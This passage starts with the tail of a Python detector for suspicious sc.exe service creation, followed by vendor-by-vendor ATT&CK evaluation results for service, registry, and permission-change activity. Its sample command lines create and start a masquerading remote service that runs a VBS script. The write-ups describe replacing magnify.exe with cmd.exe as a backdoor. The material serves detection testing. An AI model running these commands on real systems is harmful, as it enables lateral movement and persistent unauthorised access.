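        if verb in ("create", "description") and _launches_interpreter(rec["binpath"]) \
                and _claims_vendor(service, rec["description"]):
            findings.append(("T1036", f"service {service!r} borrows a vendor name but runs {rec['binpath']}"))
        return findings


# Constructed sample command lines; the update.vbs path is hypothetical.
SAMPLE_CMDLINES = [
    r'sc.exe \\Creeper create AdobeUpdater binPath= "cmd.exe /c C:\Users\Public\update.vbs" start= auto',
    r'sc.exe \\Creeper description AdobeUpdater "Synchronize with Adobe for security updates."',
    r'sc.exe \\Creeper qc AdobeUpdater',
    r'sc.exe \\Creeper start AdobeUpdater',
    r'sc.exe query wuauserv',
]


def run(cmdlines: List[str]) -> List[List[Finding]]:
    """Feed command lines through one detector in order; returns the findings per line."""
    det = ScDetector()
    return [det.process(c) for c in cmdlines]


if __name__ == "__main__":
    for line, found in zip(SAMPLE_CMDLINES, run(SAMPLE_CMDLINES)):
        print(line)
        for tid, msg in found:
            print(f"  [{tid}] {msg}")
```

The local `sc.exe query wuauserv` still produces the weak-signal and T1007 findings, which matches how the page's vendors treat any sc.exe execution as low-confidence discovery; the remote target, interpreter binPath and borrowed vendor name are what raise the create and description events to something an analyst would act on.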
Carbon Black
Enrichment
The capability enriched sc.exe execution with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to query the AdobeUpdater service on Creeper. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe execution to query the AdobeUpdater service on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing sc.exe to query the AdobeUpdater service on Creeper and enriched sc.exe with the condition SC QC Reconnaissance Command. The enrichment was tainted by the parent "Powershell executed remote commands" alert. The capability was modified after the start of the evaluation to allow the condition contributing to Enrichment to appear, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that the configuration of a system service was queried. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe remote service query on Creeper for the AdobeUpdater service (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched powershell.exe executing sc.exe as enumeration of services via the command line. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed execution of sc.exe to query for the AdobeUpdater service on 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query the AdobeUpdater service on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability identified for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the type command with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a file read event for update.vbs. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry
Telemetry showed a remote access event on update.vbs. MITRE verified telemetry was generated for the remote update.vbs file access event, but no screenshot was available. [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to start the AdobeUpdater service on Creeper. [1]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing the update.vbs from the Adobe Flash Updater service. Telemetry also showed sc.exe executing the service. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the sc.exe command to start AdobeUpdater named "Service Command Lateral Movement". The alert was also tagged with the correct ATT&CK Technique (T1035 - Service Execution) and Tactic (Execution). [1] [2]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1035 - Service Execution) and Tactic (Execution). The event was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe execution to start the AdobeUpdater service on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command starting the adobeupdater service on Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2]
F-Secure
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for sc.exe used with parameters typical for lateral movement. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to start the AdobeUpdater service on Creeper. The telemetry was tainted by the parent "Powershell executed remote commands" alert. Telemetry from Creeper also showed services.exe creating cmd.exe, which executed the update.vbs file (showing AdobeUpdater service starting). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Enrichment
The capability enriched sc.exe with a relevant ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed the sc.exe remote service start to execute the AdobeUpdater service on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper showed the execution sequence of Empire and command and control connections. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for a successful AdobeUpdater remote service execution attempt on Creeper. [1] [2] [3] [4]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. As part of the service, telemetry also showed cmd.exe executing update.vbs on 10.0.0.4 (Creeper). The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution). [1] [2] [3]
RSA
Telemetry
Telemetry showed execution of sc.exe to start the AdobeUpdater service on 10.0.0.4 (Creeper). Telemetry on Creeper showed the execution of cmd.exe to run update.vbs. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to start the AdobeUpdater service on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2]
General Behavior
A General Behavior alert was generated for the lateral movement activity. A new story grouping was generated for the event on Creeper to associate subsequent activity. [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed reg.exe executing with command-line arguments to check if terminal services were enabled. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments indicating a check to see if terminal services were enabled. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The telemetry was tainted by the parent Reg Execution (Weak Signal) alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Telemetry
Telemetry showed reg.exe with command-line arguments to check if terminal services were enabled. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments indicating a check to see if terminal services were enabled. The telemetry was tainted by the parent "New Windows service created" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that the Registry was queried for Remote Desktop (RDP) services. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent cmd.exe alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched the powershell.exe that executed reg.exe with the ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that PowerShell queried the terminal services Registry key. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed reg.exe execution with command-line arguments indicating a check to see if terminal services were enabled. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Telemetry
Telemetry within the process tree showed reg.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed, Tainted)
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed for potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (reg) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments. The telemetry was tainted by the parent "New Windows service created" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the reg.exe utility queried the Registry. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments (tainted by prior alert on suspicious PowerShell command line). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments to check if terminal services were enabled. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment (Tainted)
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed reg.exe executing with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed reg.exe execution with command-line arguments. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of takeown.exe with command-line arguments on magnify.exe. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched the execution of takeown.exe with "Permission modifications". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for takeown.exe performing activity related to swapping an accessibility features binary. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Telemetry
Telemetry showed takeown.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe with command-line arguments. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2]
FireEye
Enrichment
The capability enriched takeown.exe with an alert for Takeown Execution. The alert described how takeown can be used to change file ownership. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (takeown) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for takeown.exe changing the ownership of an accessibility feature executable. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed takeown.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe to take ownership of magnify.exe. The telemetry was tainted by the parent "New Windows service created" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched takeown.exe with a suspicious indicator that the takeown command was executed to obtain ownership of a file or directory. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed takeown.exe execution to change the file permissions on magnify.exe (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification). [1] [2] [3] [4] [5]
Enrichment (Tainted)
The capability enriched takeown.exe executing with command-line arguments as changing permission or ownership of a file or folder. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed powershell.exe executing takeown with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed takeown.exe execution to change the file permissions on magnify.exe. [1] [2]
SentinelOne
Enrichment (Tainted)
Telemetry showed takeown.exe execution with command-line arguments containing magnify.exe. The event was enriched to show that ownership of a file was taken over. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of icacls.exe with command-line arguments on magnify.exe. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched the execution of icacls.exe with "Permission modifications". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed icacls.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls.exe with command-line arguments. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2]
FireEye
Enrichment
The capability enriched icacls.exe with an alert for Icacls Execution. The alert described how icacls can be used to display or change Windows file ACLs. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (icacls) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed icacls.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for icacls.exe changing the permissions of an accessibility feature executable. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe running icacls.exe to modify magnify.exe access controls. The telemetry was tainted by the parent "New Windows service created" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched icacls.exe with a suspicious indicator that full access permissions were given to certain users. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed icacls.exe execution to change permissions on magnify.exe granting discretionary access to SYSTEM (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing icacls with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5]
Enrichment
The capability enriched icacls.exe executing with command-line arguments with the correct ATT&CK Technique (File Permissions Modification). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed icacls.exe execution to change permissions on magnify.exe granting discretionary access to SYSTEM. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed icacls.exe execution with command-line arguments containing magnify.exe. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed filemod events overwriting magnify.exe in the system directory. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe with a severity score of 51/100 when magnify.exe was replaced. The alert was also mapped to the correct ATT&CK Technique (T1015 - Accessibility Features). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4] [5]
Cybereason
Telemetry (Tainted)
Telemetry showed creation and file write events for magnify.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3]
Endgame
Specific Behavior
A Specific Behavior alert was generated named "Persistence-Accessibility Features" based on magnifier.exe being overwritten. The alert was tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed the overwrite of magnify.exe and was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Enrichment (Delayed, Tainted)
The capability enriched the magnify.exe overwrite with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified magnify.exe being overwritten with cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated for Suspicious Accessibility Features Replacement (BACKDOOR) based on magnify.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was also generated for Accessibility Features File Write (Weak Signal) based on magnifier.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched cmd.exe as being renamed to another process and with a relevant ATT&CK Technique (Masquerading). Screenshot is not available due to sensitivity of rule logic. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the modification of an accessibility features binary known to be used for privilege escalation. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed powershell.exe overwriting magnify.exe with cmd.exe via the copy command. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry also showed a different view of the event with powershell.exe copying cmd.exe as magnify.exe in the system directory. The telemetry was tainted by parent "New Windows service created" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
Enrichment (Configuration Change, Tainted)
The capability enriched powershell.exe creating and writing magnify.exe to the system directory with the condition "Creation of Sticky Keys File." The enrichment was tainted by parent "New Windows service created" alerts. The condition contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
General Behavior
A General Behavior alert was generated for powershell.exe altering the attributes of an executable file under the Windows system folder. [1] [2] [3] [4]
Telemetry
Telemetry showed a file modification event for Magnifier.exe. [1] [2] [3] [4]
Microsoft
Specific Behavior
A Specific Behavior alert was generated for overwrite of magnify.exe indicating a sticky keys binary hijack for persistence was detected. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed powershell.exe overwriting magnify.exe with the new file containing the same hash for cmd.exe. Reputation metadata confirms magnify.exe is cmd.exe under the file names observed. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed file write events overwriting magnify.exe in the system directory as well as the change in the hash of the file. The telemetry was tainted by a parent alert on cmd.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3]
RSA
Telemetry
Telemetry showed a file write event on magnify.exe in the system directory. A search for "cmd" on CodeRed shows the hash value of magnify.exe matches cmd.exe. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of magnify.exe in the system directory from a file copy event for cmd.exe with matching hash values. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the Get-ChildItem command. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the decoded PowerShell script that was executed to recursively search for .vsdx files on Conficker's remote file share. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed an event with the execution of the Get-ChildItem command. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
